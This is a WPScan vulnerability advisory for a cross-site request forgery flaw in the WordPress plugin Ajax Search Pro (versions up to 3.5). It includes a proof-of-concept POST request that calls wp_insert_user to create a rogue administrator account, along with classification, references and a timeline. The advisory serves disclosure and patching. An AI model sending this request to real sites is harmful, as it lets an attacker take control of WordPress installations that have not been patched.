Ajax Search Pro <= 3.5 - Cross-Site Request Forgery (CSRF) Add User

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
This will register an administrator with username "xADMIN" and password "xPASS":

POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

With POST data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator

Affects

Plugin ajax-search-pro
fixed in version 4.0

References

PACKETSTORM 130955
URL http://web.archive.org/web/20150619084745/http://research.evex.pw/?vuln=9

Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 357
Verified No
WPVDB ID 7859

Timeline

Publicly Published 2015-03-18 (over 1 year ago)
Added 2015-03-21 (over 1 year ago)
Last Updated 2016-12-01 (8 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.